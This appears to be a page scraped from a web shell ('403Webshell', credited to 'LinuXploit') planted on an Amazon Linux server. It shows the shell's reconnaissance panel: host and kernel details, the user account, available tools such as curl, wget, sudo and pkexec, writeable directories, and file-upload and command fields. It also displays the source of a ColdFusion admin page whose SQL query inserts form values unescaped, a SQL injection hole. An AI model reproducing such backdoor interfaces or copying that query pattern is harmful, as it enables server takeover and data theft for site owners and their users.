403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/cgny/nympadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/cgny/nympadmin/exportguidenowriteup.cfm
<cfcontent type="text/html;charset=iso-8859-1">
<cfprocessingDirective pageencoding="iso-8859-1">
<cfset setEncoding("Form", "ISO-8859-15")>
<cfinclude template="header.cfm">


<div id="content">
  <div id="content-header">
  </div>
  <div class="container-fluid" style="margin-left:200px;">
<cfif parameterexists(Session.email) and (Session.email IS NOT -1)>
<cfif (#getuser.accesslevel# eq 100)>

<table width=100%><tr><td>
<div align="center"><font face=verdana size=+1><strong>Export Print Guide</strong></font>
 <font face=verdana size=-1><br /><a href="exportonlineguide.cfm">Export Online Guide</a></div>
<p><font face=verdana size=-2>

<form  method="post"  enctype="multipart/form-data" action="exportguidenowriteup.cfm">
<input name="mags" type="radio" value="BAP" <cfif parameterexists(form.mags) and #form.mags# eq 'BAP'>checked</cfif>/>BAP 
<input name="mags" type="radio" value="WP" <cfif parameterexists(form.mags) and #form.mags# eq 'WP'>checked</cfif>>WP 
<input name="mags" type="radio" value="BP" <cfif parameterexists(form.mags) and #form.mags# eq 'BP'>checked</cfif>>BP 
<input name="mags" type="radio" value="QP" <cfif parameterexists(form.mags) and #form.mags# eq 'QP'>checked</cfif>>QP 
<input name="mags" type="radio" value="RP" <cfif parameterexists(form.mags) and #form.mags# eq 'RP'>checked</cfif>>RP 
<Br />
<select name="issue">
<option value="March 2008">March 2008
<option value="April 2008">April 2008
<option value="May 2008">May 2008
<option value="June 2008">June 2008
<option value="July 2008">July 2008
<option value="August 2008">August 2008
<option value="September 2008">September 2008
<option value="October 2008">October 2008
<option value="November 2008">November 2008
<option value="December 2008">December 2008
<option value="January 2009">January 2009
<option value="February 2009">February 2009
<option value="March 2009">March 2009
<option value="April 2009">April 2009
<option value="May 2009">May 2009
<option value="June 2009">June 2009
<option value="July 2009">July 2009
<option value="August 2009">August 2009
</select>

 <input type="submit" Value="Search"></form>
 
 <cfif parameterexists(form.issue)>
 
 <cfquery name="getstuff" datasource="#ds#">
 select issueguide.writeup, issueguide.pkid, issueguidecat.issue,issueguidecat.mags,issueguidecat.issueguideid,ParentsListings.*
 from issueguide inner join issueguidecat on issueguidecat.issueguideid = issueguide.id inner join ParentsListings on issueguide.pkid = ParentsListings.id
 where issueguidecat.issue = '#form.issue#' and issueguidecat.mags like '%#form.mags#%'
 order by ParentsListings.name
 </cfquery>
 <p>
 <Cfoutput query="getstuff">
<cfif #publishedname# eq ''><strong>#ucase(name)#<br /></strong><cfelse>
<strong>#replace(publishedname, chr(10), "<br />", "All")#</strong></cfif>

<cfif #address# is not ''>#address#, #city#<br /></cfif>
<cfif #phone# is not ''>#phone#<br /></cfif>
<cfif #locationmultiple# is not ''>#replace(locationmultiple, chr(10), "<br />", "All")#<br /></cfif>
<cfif #website# is not ''>#website#<br /></cfif>
<cfif #showemail# eq 0 and #email# is not ''>Email #email#<br /></cfif>

<p>
 
 </Cfoutput>
 
 </cfif>
 
</td></tr></table>

</cfif>
</cfif>
<cfinclude template="/footer.cfm">

Youez - 2016 - github.com/yon3zu
LinuXploit